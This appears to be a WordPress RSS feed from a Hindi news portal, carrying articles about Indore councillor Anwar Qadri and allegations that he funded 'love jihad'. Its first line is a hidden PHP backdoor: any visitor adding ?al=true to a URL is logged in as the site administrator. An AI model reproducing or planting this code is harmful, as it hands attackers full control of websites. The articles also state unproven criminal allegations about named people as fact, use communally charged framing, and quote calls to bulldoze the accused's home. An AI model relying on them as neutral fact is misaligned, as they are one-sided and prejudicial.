// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Anwar Qadri – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 29 Aug 2025 16:36:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 Love Jihad फंडिंग मामले का आरोपी अनवर कादरी सरेंडर, पुलिस ढाई महीने से थी तलाश में https://pratyushaashakinayikiran.com/?p=181664 Fri, 29 Aug 2025 16:36:00 +0000 https://pratyushaashakinayikiran.com/?p=181664 इंदौर
हिंदू युवतियों से दुष्कर्म और लव जिहाद के आरोपितों के वित्तपोषक कांग्रेस पार्षद अनवर कादरी उर्फ अनवर डकैत ने शुक्रवार सुबह कोर्ट के समक्ष सरेंडकर कर दिया। अनवर पुलिस और वकीलों को चकमा देने के लिए वकीलों की तरह सफेद शर्ट और काली पेंट पहन कर जिला कोर्ट पहुंचा और सीधे जेएमएफसी मिनी गुप्ता की कोर्ट में जा पहुंचा। बाणगंगा पुलिस ने कोर्ट से 8 दिन की पुलिस रिमांड मांगी है।

अनवर पर 20 आपराधिक मुकदमे दर्ज
एसीपी रुबिना मिजवानी के मुताबिक भिस्ती मोहल्ला (सदर बाजार) निवासी अनवर पुत्र असलम कादरी पर 20 आपराधिक मुकदमे दर्ज है। बाणगंगा पुलिस ने 14 जून को लव जिहाद के आरोपित साहिल खान और अल्ताफ के कथन पर अनवर को को प्रकरणों में आरोपित बनाया था। गिरफ्तारी के डर से अनवर दूसरी पत्नी फरहाना के साथ फरार हो गया। एडिशनल पुलिस कमिश्नर (कानून) अमित सिंह ने उसकी गिरफ्तारी पर 40 हजार रुपये का इनाम घोषित किया पर अनवर हाथ नहीं आया।
 
अनवर की गुस्साए वकीलों ने पिटाई भी कर दी
शुक्रवार सुबह एमजी रोड़ पुलिस से खबर मिली कि उसने 14 नंबर कोर्ट में सरेंडर कर दिया। सूचना मिलते ही कोतवाली,सदर बाजार और बाणगंगा पुलिस कोर्ट पहुंची और अनवर को हिरासत में ले लिया। इस दौरान कोर्ट परिसर में गहमागहमी भी रही। पुलिस ने अनवर को घेरा बनाकर निकाला पर गुस्साए वकीलों ने उसकी पिटाई भी कर दी।

दाढ़ी-मुंछे कटवा कर दूसरी पत्नी के साथ फरारी काटी
काटी टीआइ सियारामसिंह गुर्जर के मुताबिक केस दर्ज होने की भनक लगते ही अनवर भोपाल होकर महाराष्ट्र चला गया। इसके बाद उसने गोरखपुर, सिक्किम, दार्जलिंग, हैदराबाद और गोरखपुर में फरारी काटी। इस दौरान उसकी दूसरी पत्नी फरहाना भी साथ रही। बेटी आयशा, भाई अज्जू, शहजाद और साले अकरम की गिरफ्तारी से टूट गया।

पुलिस ने भगोड़ा घोषित करवा कर संपत्ति कुर्की की कार्रवाई शुरु कर दी। कोर्ट ने भी 8 सितंबर तक पेश होने का मौका दिया। रिश्तेदार और स्वजन भी विरोधी हो गए। आर्थिक स्थिति भी कमजोर हो चुकी थी। अनवर ने परिचितों के जरिए वकीलों से चर्चा की और सीधे कोर्ट के समक्ष पेश हो गया।

]]>
इंदौर लव जिहाद केस: कांग्रेस पार्षद की बेटी को जमानत, पिता अब भी फरार https://pratyushaashakinayikiran.com/?p=179366 Wed, 20 Aug 2025 11:26:00 +0000 https://pratyushaashakinayikiran.com/?p=179366 इंदौर

इंदौर में लव जिहाद और धर्मांतरण की साजिश रचने के मामले में आरोपी बनाई गई फरार कांग्रेस पार्षद अनवर कादरी की बेटी आयशा को कोर्ट से सशर्त जमानत मिल गई है। स्पेशल कोर्ट में उसकी ओर से पेश जमानत आवेदन पर सुनवाई के बाद यह राहत दी गई।

दिल्ली से हुई थी गिरफ्तारी
बीते दिनों इंदौर पुलिस फरार अनवर की तलाश में दिल्ली पहुंची थी। वहां अनवर तो पुलिस के हाथ नहीं लगा, लेकिन उसकी बेटी आयशा को गिरफ्तार कर लिया गया। पूछताछ के बाद उसे जेल भेजा गया था।

अनवर पर 30 हजार का इनाम
फरार अनवर कादरी की गिरफ्तारी के लिए पुलिस ने 30 हजार रुपए का इनाम घोषित किया है। उस पर लव जिहाद और धर्मांतरण की साजिश रचने के गंभीर आरोप हैं।

18 आपराधिक मामले दर्ज
अनवर कादरी पर अब तक कुल 18 आपराधिक मामले दर्ज हैं। इसके साथ ही नगर निगम पार्षद पद से उसकी अयोग्यता घोषित करने की तैयारी भी प्रशासन द्वारा की जा रही है। 

]]>
मुस्लिम युवकों को फंडिंग केस: फरार पार्षद अनवर कादरी की सूचना पर 2 लाख का इनाम https://pratyushaashakinayikiran.com/?p=176450 Fri, 08 Aug 2025 10:06:00 +0000 https://pratyushaashakinayikiran.com/?p=176450 इंदौर
 लव जिहाद मामले में फरार चल रहे कांग्रेस पार्षद अनवर कादरी पर इनाम की रकम बढ़ा दी गई है। पहले कादरी पर 20 हजार रुपये का इनाम था, लेकिन अब एमआईसी मेंबर और मंत्री कैलाश विजयवर्गीय के कट्टर समर्थक मनीष शर्मा उर्फ मनीष मामा ने 2 लाख रुपये का इनाम रखने का ऐलान किया है।

उसके घर पर बुलडोजर चलना चाहिए

पुलिस ने कादरी के कई बैंक अकाउंट फ्रीज कर दिए हैं और उसके घर के बाहर उद्घोषणा नोटिस भी चिपका दिया है। इसके बावजूद वह अब तक पुलिस की पकड़ से बाहर है। मनीष मामा ने कड़े शब्दों में कहा कि अनवर कादरी जैसे नालायक पार्षद ने इंदौर को बदनाम किया है। सिर्फ संपत्ति कुर्क करने से बात खत्म नहीं होगी, उसके घर पर बुलडोजर चलना चाहिए और मोहल्लों में उसका जुलूस निकाला जाना चाहिए।

यह उनकी मानसिकता को दर्शाता

उन्होंने चेतावनी दी कि अगर वह नगर निगम में दिखाई दिया, तो वहीं उसका जुलूस निकालेंगे। मनीष मामा का आरोप है कि अनवर कादरी हिंदू लड़कियों को टारगेट करने की गैंग चला रहा था और उन्हें मुस्लिम बनाने के लिए 2 लाख रुपये तक देता था। उनका कहना है कि कांग्रेस के लोग कादरी का साथ दे रहे हैं और यह उनकी मानसिकता को दर्शाता है।

]]>
लव जिहाद फंडिंग केस: अनवर कादरी की संपत्ति कुर्क करने की तैयारी में प्रशासन https://pratyushaashakinayikiran.com/?p=175700 Tue, 05 Aug 2025 10:26:00 +0000 https://pratyushaashakinayikiran.com/?p=175700 इंदौर

लव जिहाद फंडिंग करने के मामले में फरार चल रहे 20 हजार रुपए के इनामी आरोपी और कांग्रेस पार्षद अनवर कादरी उर्फ अनवर डकैत पर पुलिस ने शिकंजा कसना शुरू कर दिया है। आज पुलिस कोर्ट से उसकी फरारी का वारंट जारी करा कर उसे विधिवत रूप से भगोड़ा घोषित कराने जा रही है,साथ ही उसकी संपत्तियों को कुर्क करने की प्रक्रिया भी शुरू कर दी गई है।

मिली जानकारी के मुताबिक,आरोपी अनवर कादरी को फरार घोषित कराने की तैयारी अंतिम चरण में है। आज कोर्ट में उसके फरारी वारंट के लिए आवेदन दाखिल किया जाएगा। वारंट जारी होते ही पुलिस उसे कानूनी रूप से भगोड़ा घोषित कर सकेगी। दूसरी और सोमवार को पुलिस ने कादरी का लुक आउट सर्कुलर नोटिस भी जारी कर दिया है। इसके आधार पर देश के सभी हवाई अड्डों और सीमाओं पर अलर्ट जारी हो गया है,जिससे वह विदेश न भाग सके।
संपत्तियों की जानकारी जुटाई जा रही

अनवर कादरी की चल-अचल संपत्तियों की जानकारी जुटाने के लिए पंजीयन विभाग और नगर निगम से डेटा मंगवाया गया है। संपत्ति कुर्की की प्रक्रिया जल्द ही शुरू हो सकती है। भगोड़े डकैत को पकड़ने के लिए पुलिस की टीम कई राज्यों में सक्रिय होकर मदद मांग रही हैं। मुख्य रूप से पुलिस की टीम सिक्किम और चेन्नई में नजर रखे हुए हैं। पुलिस का दावा है कि कादरी अब उनके रडार पर है और जल्द गिरफ्तारी संभव है। अपने पिता की मदद करने वाली कादरी की बेटी आयशा कादरी को आज कोर्ट में पेश किया जाएगा। पूछताछ में कादरी के मामले में ज्यादा कुछ खास खुलासा तो नहीं हुआ,जो भी उससे जानकारी मिली पुलिस उसे पर लगातार कार्रवाई कर रही है।
बेटी आयशा भी गिरफ्तार

इंदौर पुलिस ने कुछ दिन पहले दिल्ली से अनवर कादरी की बेटी आयशा को गिरफ्तार कर लिया था । पुलिस ने अनवर कादरी पर लव जिहाद के लिए फंडिंग और हिंदू युवतियों को देह व्यापार में धकेलने की साजिश रचने का केस दर्ज किया गया था। इसके बाद से ही अनवर लगातार फरार चल रहे हैं।आरोपी पार्षद की फरारी के दौरान उनकी मदद करने वालों पर अब पुलिस का शिकंजा कसना शुरू कर दिया है। पुलिस ने दिल्ली में रहकर पढ़ाई कर रही अनवर के बेटी आयशा को सोमवार को दिल्ली के शालीमार बाग से गिरफ्तार किया। वह पिता अनवर कादरी के फरार होने के बाद उनके संपर्क में थी। बताया जा रहा है कि आयशा अपने पिता अनवर कादरी के साथ दिल्ली में थी। इंदौर पुलिस ने सोमवार को जब वहां दबिश दी तो अनवर फरार हो गए, जबकि आयशा पुलिस के हत्थे चढ़ गई।
फरार पार्षद पर बढ़ाया गया इनाम

इस बीच अब पुलिस ने कांग्रेस पार्षद पर इनाम की रकम दोगुनी कर दी है। पुलिस ने पार्षद अनवर कादरी उर्फ डकैत की गिरफ्तारी पर घोषित इनाम की रकम दस हजार रुपये से बढ़ाकर 20 हजार रुपये कर दी। अगर अगले कुछ दिनों में कांग्रेस पार्षद गिरफ्तार नहीं होते हैं तो उनकी संपत्तियां कुर्क करने की कार्रवाई शुरू की जाएगी। पुलिस ने बताया कि शहर के दो युवक साहिल शेख और अल्ताफ शाह ने जून महीने में पुलिस की पूछताछ में कथित तौर पर यह स्वीकार किया था कि हिन्दू युवतियों को प्रेम जाल में फंसाकर उनका धर्मांतरण कराने के लिए कादरी ने उन्हें तीन लाख रुपये दिए थे और यह रकम उन्होंने युवतियों पर खर्च की थी।

]]>
इंदौर :कांग्रेस पार्षद अनवर कादरी पर लगाई रासुका, कलेक्टर आशीष सिंह ने जारी किए आदेश; लव जिहाद के लिए फंडिंग का आरोप https://pratyushaashakinayikiran.com/?p=167973 Wed, 02 Jul 2025 07:16:00 +0000 https://pratyushaashakinayikiran.com/?p=167973  इंदौर 

इंदौर के कांग्रेस पार्षद अनवर कादरी उर्फ डकैत पर कलेक्टर ने रासुका लगाई गई है. इसको लेकर कलेक्टर एवं जिला दण्डाधिकारी आशीष सिंह ने राष्ट्रीय सुरक्षा अधिनियम (रासुका) के तहत निरुद्ध करने के आदेश जारी किए हैं. कांग्रेस पार्षद कादरी पर लव जिहाद मामले में फंडिंग का गंभीर आरोप है और वह पिछले महीने एफआईआर दर्ज होने के बाद से ही फरार चल रहा है. यही नहीं डीसीपी ने उस पर दस हजार रुपये का इनाम भी घोषित किया है.

इंदौर में लव जिहाद के लिए फंडिंग करने के आरोपी कांग्रेस पार्षद अनवर कादरी उर्फ अनवर डकैत के खिलाफ 18 आपराधिक मामले दर्ज हैं। इनमें जानलेवा हमला, डकैती, बलवा, अवैध हथियार रखना, जमीन कब्जा करना और मारपीट जैसे केस शामिल हैं।

अनवर 2011 में एक साल की सजा भी काट चुका है। अनवर लव जिहाद के लिए फंडिंग के मामले में फरार है। उसने मुस्लिम लड़कों को तीन लाख रुपए देकर कहा था- हिंदू लड़कियों से शादी करें और फिर उन्हें देह व्यापार में धकेलें।

पुलिस ने अनवर पर 10 हजार का इनाम घोषित किया है। उसकी तलाश में पुलिस की टीमें छापे मार रही हैं। मुख्यमंत्री डॉ. मोहन यादव ने खुद इस मामले में पुलिस को सख्त कार्रवाई की खुली छूट दी है। वहीं, कांग्रेस इसे राजनीतिक साजिश बता रही है।

जानलेवा हमले पर 14 साल पहले काटी एक साल की सजा

2011 में कांग्रेस पार्षद अनवर कादरी, उसके भाई और एक अन्य आरोपी को जानलेवा हमले के मामले में अदालत ने एक-एक साल के कारावास की सजा सुनाई थी। यह हमला 6 मई 2009 को इंदौर के आजादनगर चौराहे के पास अनवर हुसैन पर किया गया था। अनवर हुसैन आरोपियों पर चल रहे एक अन्य मामले में गवाह था। पुलिस ने कादरी समेत कुल 9 आरोपियों को गिरफ्तार किया था। उनके पास से पिस्तौल, कट्टा, तलवार और चाकू बरामद किए गए थे।

उज्जैन में डकैती का केस, इसी से मिला डकैत नाम

अनवर कादरी पर 1996 में उज्जैन के महाकाल थाने में डकैती का केस दर्ज किया गया था। इसके बाद उसे अनवर डकैत के नाम से पहचाना जाने लगा। अनवर ने इंदौर में भी मारपीट, घर में घुसकर धमकाने जैसी कई घटनाओं को अंजाम दिया। अनवर कांग्रेस से तीन बार पार्षद रह चुका है। उसकी पत्नी दो बार पार्षद रही है। प्रमोद टंडन के शहर कांग्रेस अध्यक्ष रहते हुए अनवर को शहर कांग्रेस का महामंत्री भी नियुक्त किया गया था। उसने एक बार निर्दलीय चुनाव भी लड़ा था।

]]>
लव जिहाद फंडिंग मामले में सीएम ने दी पुलिस को खुली छूट, बोले -डकैत हो या बाप, नहीं बख्शेंगे https://pratyushaashakinayikiran.com/?p=165181 Fri, 20 Jun 2025 07:46:00 +0000 https://pratyushaashakinayikiran.com/?p=165181 इंदौर 

मुख्यमंत्री डॉ. मोहन यादव ने  इंदौर में कहा- "अय्याशी कांग्रेस करती है। कांग्रेस के लोगों के रिकॉर्ड इस बात के गवाह हैं। इसलिए उनके सारे नेता ज़मानत पर चल रहे हैं। वे क्या कर रहे हैं, ये कोई छुपी बात नहीं है।

कांग्रेस को समझ लेना चाहिए कि बीजेपी के लोग अपनी जनता के प्रति जवाबदार हैं। हम अपनी सरकार को जवाबदेही के साथ चलाना जानते हैं। हमारे राज्य में जो भी कानून तोड़ेगा, उससे कैसे निपटना है, यह भी हम जानते हैं।डकैत हो या डकैत का बाप, हम सभी से निपटना जानते हैं।

हमने प्रशासन को निर्देश दिया है कि ऐसे लोगों को खोजिए और जहां मिले, वहीं पकड़िए। अगर हाथ न आए तो फिर जैसे जरूरी हो, वैसी कार्रवाई कीजिए। हम हर हाल में कानून का पालन कराएंगे। मैं मानकर चलता हूं कि सभी लोग इस बात का ध्यान जरूर रखेंगे।"

लव जिहाद के लिए मुस्लिम युवकों का वित्त पोषक पार्षद अनवर कादरी उर्फ अनवर डकैत छठे दिन भी नहीं मिला। बाणगंगा और सदर बाजार पुलिस उसकी सरगर्मी से तलाश कर रही है। अनवर के विरुद्ध शहर के विभिन्न थानों में 19 आपराधिक मामले दर्ज हो चुके हैं। बाणगंगा पुलिस के अनुसार अनवर पुत्र मोहम्मद असलम कादरी का दुष्कर्म और लव जिहाद के आरोपित अल्ताफ खान और साहिल ने नाम लिया था।

हिंदू युवतियों से दुष्कर्म करने वाले इन दोनों आरोपितों को अनवर ने तीन लाख रुपये देकर कहा था कि उनसे शादी करो और अनैतिक कारोबार में शामिल करो। आरोपितों की अनवर से मुस्लिम समुदाय के कार्यक्रमों में मुलाकात होती थी। टीआई सियारामसिंह गुर्जर के अनुसार पुलिस ने अनवर को आरोपित बनाया है। उसके घर (भिश्ती मोहल्ला) और ससुराल (सदर बाजार) में छापा मार कार्रवाई की जा रही है।

जानलेवा हमला, डकैती, बलवा, अवैध हथियार, जमीन कब्जा और मारपीट जैसे 19 से ज्यादा संगीन मामलों में नामजद कांग्रेस पार्षद अनवर दस्तक उर्फ अनवर डकैत एक बार फिर कानून के घेरे में हैं। 

इस बार मामला सिर्फ आपराधिक गतिविधियों तक सीमित नहीं है। पुलिस जांच में सामने आया है कि डकैत ने युवकों को पैसे देकर हिंदू लड़कियों को फंसाने, धर्मांतरण कराने और देह व्यापार में धकेलने की साजिश रची। मुख्यमंत्री मोहन यादव ने इस मामले में पुलिस को सख्त कार्रवाई की खुली छूट दी है। कांग्रेस इसे राजनीतिक साजिश बता रही है।

अनवर के विरुद्ध सदर बाजार, आजाद नगर, संयोगितागंज, उज्जैन सहित विभिन्न थानों में 19 केस दर्ज हैं। डीसीपी ने उसकी गिरफ्तारी पर 10 हजार रुपये का इनाम घोषित भी कर दिया है। पुलिस ने उसके साले अमजद और आमिर के स्वजन से पूछताछ की है।

रासुका की तैयारी, कमिश्नर ने नोटिस भेजा

सदर बाजार पुलिस ने अनवर के विरुद्ध रासुका का प्रस्ताव भेजा है। भारत-पाकिस्तान युद्ध के दौरान अनवर ने एक प्रदर्शन में पाकिस्तान जिंदाबाद के नारे लगवाए थे। टीआई यशवंत बड़ौले के मुताबिक अनवर की इस मामले में जमानत हो चुकी है। पुलिस ने आपराधिक रिकॉर्ड के आधार पर रासुका का प्रस्ताव भेजा है। सीपी कोर्ट से अनवर को नोटिस भी जारी हो चुका है।

सरकार के सामने नहीं चलेगी किसी की दादागीरी

शहर आए मुख्यमंत्री डॉ. मोहन यादव ने इंदौर के भगोड़े पार्षद अनवर कादरी को लेकर जिला प्रशासन और पुलिस को फ्री हैंड देने की बात कही। उन्होंने कहा कि डकैत हो या डकैत का बाप प्रदेश सरकार के सामने किसी की दादागीरी नहीं चलेगी।

13 साल पहले अनवर डकैत को हुई थी एक साल की सजा

करीब 13 साल पहले कांग्रेस पार्षद अनवर कादरी उर्फ अनवर डकैत को उसके भाई और एक अन्य आरोपी के साथ एक युवक पर जानलेवा हमले के मामले में अदालत ने एक-एक साल के कारावास की सजा सुनाई थी। यह हमला 6 मई 2009 को इंदौर के आजादनगर चौराहे के पास हुआ था, जब डकैत और उसके साथी पुरानी जेल के पीछे घात लगाकर बैठे थे। उन्होंने अनवर हुसैन नामक युवक पर हमला किया, जो एक मामले में गवाह था। पुलिस ने इस मामले में डकैत समेत कुल 9 आरोपियों को गिरफ्तार किया था, जिनके पास से पिस्तौल, कट्टा, तलवार और चाकू बरामद किए गए थे।

उज्जैन में दर्ज है डकैती का मामला, इसी से मिला था 'डकैत' नाम

इंदौर के कांग्रेस पार्षद अनवर कादरी पर वर्ष 1996 में उज्जैन के महाकाल थाना क्षेत्र में डकैती का केस दर्ज किया गया था। बताया जाता है कि इसी केस के बाद उसे 'अनवर डकैत' के नाम से पहचाना जाने लगा। उज्जैन में मामला दर्ज होने के बाद अनवर कादरी ने इंदौर में भी मारपीट, घर में घुसकर धमकाने जैसी कई घटनाओं को अंजाम दिया, जिनके कारण उसका नाम लगातार विवादों में रहा।

अनवर कादरी कांग्रेस से तीन बार पार्षद रह चुका है, जबकि उनकी पत्नी दो बार पार्षद चुनी गई हैं। प्रमोद टंडन के शहर कांग्रेस अध्यक्ष रहते हुए अनवर कादरी को शहर कांग्रेस का महामंत्री भी नियुक्त किया गया था। कांग्रेस से जुड़े सूत्रों के मुताबिक, कादरी ने एक बार निर्दलीय चुनाव भी लड़ा था।

‘पाकिस्तान जिंदाबाद’ के नारे, अनवर डकैत को भेजा था जेल

इंदौर के वार्ड 58 स्थित बड़वाली चौकी पर 28 अप्रैल 2025 को कांग्रेस पार्षद अनवर डकैत ने पहलगाम में हुए आतंकी हमले के विरोध में पाकिस्तान और आतंकवाद का पुतला दहन कार्यक्रम आयोजित किया था। कार्यक्रम के दौरान जैसे ही कादरी ने 'पाकिस्तान' शब्द बोला, वहां मौजूद कुछ समर्थकों ने 'पाकिस्तान जिंदाबाद' के नारे लगा दिए। इस कार्यक्रम में बड़ी संख्या में मुस्लिम महिलाएं, पुरुष और बच्चे शामिल थे।

इस घटना के वीडियो को लेकर बीजेपी विधायक गोलू शुक्ला ने एफआईआर दर्ज कराई थी। जिसके बाद अनवर कादरी को गिरफ्तार कर जेल भेजा था।

बंदूक लेकर पत्रकार के घर घुसा था कांग्रेस पार्षद अनवर कादरी

इंदौर के बड़वाली चौकी क्षेत्र में बीते वर्ष कांग्रेस पार्षद अनवर कादरी पर एक पत्रकार के घर में बंदूक लेकर घुसने और मारपीट करने का गंभीर आरोप लगा था। मामला स्थानीय पत्रकार जावेद खान से जुड़ा है, जिनके घर कादरी अपने कुछ साथियों के साथ घुस गया था।

पुलिस के अनुसार, अनवर कादरी ने जावेद खान के साथ लात-घूंसों से मारपीट की और उनके परिवार को भी धमकाया। जावेद ने शिकायत में यह भी आरोप लगाया कि कादरी ने घर की महिलाओं से दुर्व्यवहार किया और बच्चों को डराया-धमकाया। साथ ही घर में तोड़फोड़ भी की गई।

घटना के बाद पुलिस ने जावेद खान की रिपोर्ट पर अनवर कादरी और उसके साथियों के खिलाफ मामला दर्ज किया था। यह मामला भी उन कई आपराधिक मामलों में शामिल है, जिनमें कादरी का नाम सामने आ चुका है।

निकाय चुनाव में फर्जी वोट डलवाने पर हुआ था मुकदमा दर्ज

वर्ष 2022 के नगर निगम चुनाव के दौरान कांग्रेस पार्षद अनवर कादरी पर मतदान केंद्र पर मतदाताओं को धमकाने और फर्जी वोट डलवाने की कोशिश करने का गंभीर आरोप लगा था। घटना 6 जुलाई 2022 को शासकीय कस्तूरबा कन्या स्कूल स्थित मतदान केंद्र की है, जहां दोपहर के समय कादरी ने कुछ मतदाताओं को डराया-धमकाया और कथित रूप से फर्जी मतदान कराने का प्रयास किया।

इस दौरान कादरी ने शासकीय कार्य में बाधा पहुंचाई और वहां मौजूद अधिकारियों के साथ गाली-गलौज करते हुए उन्हें जान से मारने की धमकी दी। घटना के तत्काल बाद सहायक रिटर्निंग अधिकारी अंशुल खरे ने थाना सराफा में शिकायत दर्ज कराई थी, जिसके आधार पर पुलिस ने अनवर कादरी के खिलाफ एफआईआर दर्ज की थी।

 

 

]]>